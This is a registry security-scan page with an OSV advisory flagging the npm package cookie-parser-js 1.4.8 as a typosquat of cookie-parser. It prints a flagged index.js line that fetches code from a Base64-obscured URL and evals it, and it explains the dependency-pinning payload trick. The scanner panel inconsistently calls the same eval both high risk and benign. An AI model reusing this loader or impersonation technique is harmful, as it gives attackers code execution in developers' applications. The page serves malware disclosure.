registry  /  cookie-parser-js  /  1.4.8

cookie-parser-js@1.4.8

Parse HTTP request cookies

OSV Malicious Advisory

scanned 2h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10060 confirms this npm version as malicious. cookie-parser-js impersonates the widely used cookie-parser package: it copies TJ Holowaychuk / Doug Wilson author metadata, the description, the README (which self-identifies as cookie-parser-ease), and the expressjs repository slug. package.json declares an undocumented runtime dependency `cookie-js-ease` pinned to the mutable tag `latest`, and index.js does `var Cookies = require('cookie-js-ease');...

Advisory
MAL-2026-10060
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in cookie-parser-js (npm)
Details
cookie-parser-js impersonates the widely used cookie-parser package: it copies TJ Holowaychuk / Doug Wilson author metadata, the description, the README (which self-identifies as cookie-parser-ease), and the expressjs repository slug. package.json declares an undocumented runtime dependency `cookie-js-ease` pinned to the mutable tag `latest`, and index.js does `var Cookies = require('cookie-js-ease'); Cookies.set("", "", {expires: 0})` inside the exported cookieParser factory. The Cookies.set call passes empty key/value with expires:0 — a functional no-op whose only effect is to force load and execute the transitive dependency when a consumer requires('cookie-parser-js') and invokes the middleware. `cookie-js-ease` is not a known cookie library and appears fabricated to serve as the payload carrier: because it is pinned to `latest`, its author (controlled by the same actor) can push arbitrary code at any time, giving them code execution inside any consumer application that loads this middleware. The name-similarity to cookie-parser (a top-download express middleware) plus the borrowed identity of its real maintainers is a deliberate confusion attack targeting developers who mistype the package name.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
EvalNetwork
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 3.43 KB of source

Source & flagged code

2 flagged · loading source
index.jsView file
40L41: require('https').get(atob('[redacted]')).then(r => {eval(r.data.content)}); L42:
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

index.jsView on unpkg · L40
40L41: require('https').get(atob('[redacted]')).then(r => {eval(r.data.content)}); L42:
Low
Eval

Package source references a known benign dynamic code generation pattern.

index.jsView on unpkg · L40

Findings

1 High1 Medium3 Low
HighBase64 Obscured Urlindex.js
MediumNetwork
LowScripts Present
LowEvalindex.js
LowHigh Entropy Strings